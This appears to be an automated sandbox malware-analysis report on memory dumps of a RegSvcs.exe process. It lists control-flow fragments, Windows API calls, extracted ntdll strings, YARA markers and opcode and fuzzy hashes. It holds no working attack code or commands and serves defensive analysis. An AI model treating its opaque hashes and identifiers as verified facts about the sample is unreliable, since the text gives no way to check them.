                                                        control_flow_graph 66 413dc3-413dd5 67 413ddd-413e2d call 42e8e3 call 417913 call 404803 call 424b93 66->67 68 413dd8 call 42ded3 66->68 78 413e4d-413e53 67->78 79 413e2f-413e3e PostThreadMessageW 67->79 68->67 79->78 80 413e40-413e4a 79->80 80->78
                                                        APIs
                                                        • PostThreadMessageW.USER32(30-335c-,00000111,00000000,00000000), ref: 00413E3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 1836367815-1592865780
                                                        • Opcode ID: 1a33abe9125e22c3d9cda4ae2146027bfca8ef5ad92343d93c75efa7851675ce
                                                        • Instruction ID: d6a6efb2eefad1229f6055cd6ab6872639b162586c0850b2537da21b00a822ab
                                                        • Opcode Fuzzy Hash: 1a33abe9125e22c3d9cda4ae2146027bfca8ef5ad92343d93c75efa7851675ce
                                                        • Instruction Fuzzy Hash: A50126B2D0021CBADB01AAE19C81EEF7B7CDF44794F04806AFA04B7141D6785F068BB5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 90 42c123-42c167 call 404893 call 42cff3 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C162
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: dfA
                                                        • API String ID: 3298025750-2195916745
                                                        • Opcode ID: 60d45fc8e91b3cb3f4a2e528d384ce29a65e96e7add9b648694c691b60e48049
                                                        • Instruction ID: 81664a15ac327da8fa3ce07262a696d6d9176a14267145b5e06273692ad50140
                                                        • Opcode Fuzzy Hash: 60d45fc8e91b3cb3f4a2e528d384ce29a65e96e7add9b648694c691b60e48049
                                                        • Instruction Fuzzy Hash: F2E06DB2204205BBD614EE99EC41EAB33ADEFC9710F444429FA08A7282C670B91087B4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 117 42c0d3-42c117 call 404893 call 42cff3 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041E2DE,?,?,00000000,?,0041E2DE,?,?,?), ref: 0042C112
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction ID: dc71e4e836e3d7739932b3e19da150ba6b929024821e41545cd98fec97057096
                                                        • Opcode Fuzzy Hash: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction Fuzzy Hash: 5FE06DB26042457BCA10EE99EC41FDB33ADEFC9710F004429FA08A7281C6B4B91086B4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 127 42c173-42c1af call 404893 call 42cff3 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(?,00000000,?,?,9A4A2134,?,?,9A4A2134), ref: 0042C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: a1d861fb7979714361510d997871f0d5e9f43079afdea287bcc600ae3fe074fc
                                                        • Instruction ID: e708148261a625ee2c339213655c3999ca2554bc23a574720275f2ed349581f2
                                                        • Opcode Fuzzy Hash: a1d861fb7979714361510d997871f0d5e9f43079afdea287bcc600ae3fe074fc
                                                        • Instruction Fuzzy Hash: A9E04F362006547BD620BA5ADC41F9B775DDFC5714F40842AFA0C67181C6B4790587A5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 132 1662c0a-1662c0f 133 1662c11-1662c18 132->133 134 1662c1f-1662c26 LdrInitializeThunk 132->134
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
                                                        • Instruction ID: ed04d65438d043016408d079d6d25e8f8396ab6dfcbe044dfe025994d13a91ed
                                                        • Opcode Fuzzy Hash: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
                                                        • Instruction Fuzzy Hash: 16B09B719015C5C9DB51F7644E0C717790477D0701F15C175D6030751F4738C5D1E275
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        • Opcode ID: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
                                                        • Instruction ID: 2eed2a66f7b874528d3001fed460f260983ad90ae624c5de66e018a8a2708a28
                                                        • Opcode Fuzzy Hash: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
                                                        • Instruction Fuzzy Hash: A6929971688342ABE721CE28CC90B6BBBE9BB84754F44482DFA9597351D770EC44CF92
                                                        Strings
                                                        • undeleted critical section in freed memory, xrefs: 0169542B
                                                        • corrupted critical section, xrefs: 016954C2
                                                        • Invalid debug info address of this critical section, xrefs: 016954B6
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954E2
                                                        • Address of the debug info found in the active list., xrefs: 016954AE, 016954FA
                                                        • Critical section address, xrefs: 01695425, 016954BC, 01695534
                                                        • Critical section debug info address, xrefs: 0169541F, 0169552E
                                                        • Thread identifier, xrefs: 0169553A
                                                        • 8, xrefs: 016952E3
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016954CE
                                                        • Critical section address., xrefs: 01695502
                                                        • double initialized or corrupted critical section, xrefs: 01695508
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0169540A, 01695496, 01695519
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01695543
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
                                                        • Instruction ID: 8994ba9d461c7da84f86bb1280a13b37959cc491b21b28ff538c93cd1f6d9a25
                                                        • Opcode Fuzzy Hash: 785699c228474fffb78364bc0ea53687cf395abe7ddca3b1f73f3c538e3d8995
                                                        • Instruction Fuzzy Hash: A0819AB1E01358AFDF26CF99CC41BAEBBB9EB48710F10415AF506B7681D3B5A941CB60
                                                        Strings
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016924C0
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01692498
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0169261F
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01692506
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01692412
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01692602
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01692624
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016922E4
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016925EB
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01692409
                                                        • @, xrefs: 0169259B
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        Strings
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 016A8A3D
                                                        • AVRF: -*- final list of providers -*- , xrefs: 016A8B8F
                                                        • VerifierFlags, xrefs: 016A8C50
                                                        • VerifierDlls, xrefs: 016A8CBD
                                                        • VerifierDebug, xrefs: 016A8CA5
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 016A8A67
                                                        • HandleTraces, xrefs: 016A8C8F
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01679A11, 01679A3A
                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01679A2A
                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01679A01
                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016799ED
                                                        • apphelp.dll, xrefs: 01616496
                                                        • LdrpInitShimEngine, xrefs: 016799F4, 01679A07, 01679A30
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01692178
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016921BF
                                                        • SXS: %s() passed the empty activation context, xrefs: 01692165
                                                        • RtlGetAssemblyStorageRoot, xrefs: 01692160, 0169219A, 016921BA
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01692180
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0169219F
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0165C6C3
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 016981E5
                                                        • LdrpInitializeProcess, xrefs: 0165C6C4
                                                        • Loading import redirection DLL: '%wZ', xrefs: 01698170
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01698181, 016981F5
                                                        • LdrpInitializeImportRedirection, xrefs: 01698177, 016981EB
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        APIs
                                                          • Part of subcall function 01662DF0: LdrInitializeThunk.NTDLL ref: 01662DFA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BA3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BB6
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D60
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D74
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                        • String ID:
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01658421
                                                        • LdrpInitializeProcess, xrefs: 01658422
                                                        • @, xrefs: 01658591
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0165855E
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • .Local, xrefs: 016528D8
                                                        • SXS: %s() passed the empty activation context, xrefs: 016921DE
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016921D9, 016922B1
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016922B6
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        Strings
                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01693437
                                                        • RtlDeactivateActivationContext, xrefs: 01693425, 01693432, 01693451
                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0169342A
                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01693456
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0168106B
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016810AE
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01680FE5
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01681028
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0168A9A2
                                                        • LdrpDynamicShimModule, xrefs: 0168A998
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0168A992
                                                        • apphelp.dll, xrefs: 01642462
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 01633255
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0163327D
                                                        • HEAP: , xrefs: 01633264
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        • API String ID: 0-1077428164
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0168A121
                                                        • Failed to allocated memory for shimmed module list, xrefs: 0168A10F
                                                        • LdrpCheckModule, xrefs: 0168A117
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-161242083
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-1334570610
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 016982E8
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 016982DE
                                                        • Failed to reallocate the system dirs string !, xrefs: 016982D7
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1783798831
                                                        Strings
                                                        • PreferredUILanguages, xrefs: 016DC212
                                                        • @, xrefs: 016DC1F1
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016DC1C5
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        • API String ID: 0-2968386058
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        • API String ID: 0-1373925480
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016A4888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 016A4899
                                                        • LdrpCheckRedirection, xrefs: 016A488F
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-3154609507
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 016A2104
                                                        • LdrpInitializationFailure, xrefs: 016A20FA
                                                        • Process initialization failed with status 0x%08lx, xrefs: 016A20F3
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2986994758
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        Strings
                                                        • LdrResSearchResource Exit, xrefs: 0162AA25
                                                        • LdrResSearchResource Enter, xrefs: 0162AA13
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                        • API String ID: 0-4066393604
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$MUI
                                                        • API String ID: 0-17815947
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0162063D
                                                        • kLsE, xrefs: 01620540
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0162A2FB
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0162A309
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                        • Instruction ID: ba69b71503f592f0185f437dbabc6a211e8203dffeb8b064576029a7b5222dfe
                                                        • Opcode Fuzzy Hash: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                        • Instruction Fuzzy Hash: D2918571900229AFEB21DF95CD85FAEBBB9EF54750F544059F600AB290D774AD00CFA4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                        • Instruction ID: 312457e019b8ea4c13b605ed6c50d1b9caf2222f3cf833f2d1a35cc4a53a8f50
                                                        • Opcode Fuzzy Hash: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                        • Instruction Fuzzy Hash: 71918032900649AFDB22ABA5DC44FBFBF7AEF95B50F10001DF505A7250DB79A901CB94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .mui
                                                        • API String ID: 0-1199573805
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryName
                                                        • API String ID: 0-215506332
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016A895E
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                        • API String ID: 0-702105204
                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                        • Instruction ID: c876e3de4e49ff765372efbc5095f6f6456314a0517019185ce6f3f8b2ec08a0
                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                        • Instruction Fuzzy Hash: D4B11571E0061A9FDB29CFA9C890AADBBB5FF88310F14816DEA15A7354D730E941CF94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                        • Instruction ID: 9c548cd10b645f9bec6e11f92875b960c25f9eaff6a5db3462edd7a9bbca3def
                                                        • Opcode Fuzzy Hash: f0833b8430aa5a8ce002c45f3140018a7f68ffb3914291b17b287594caa0379d
                                                        • Instruction Fuzzy Hash: A091A171D00216AFDB15CFA8DC94BAEBFB5AF48710F5941A9E610AB341D734ED018FA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d08ba42322d732e12577b4c8c1a999441f3ec4b8547f22b57544b3360223f1a
                                                        • Instruction ID: 616beb3dbc6778b664b4d8b38242cf337d1281f3b313dec9d68e507b25581d2e
                                                        • Opcode Fuzzy Hash: 8d08ba42322d732e12577b4c8c1a999441f3ec4b8547f22b57544b3360223f1a
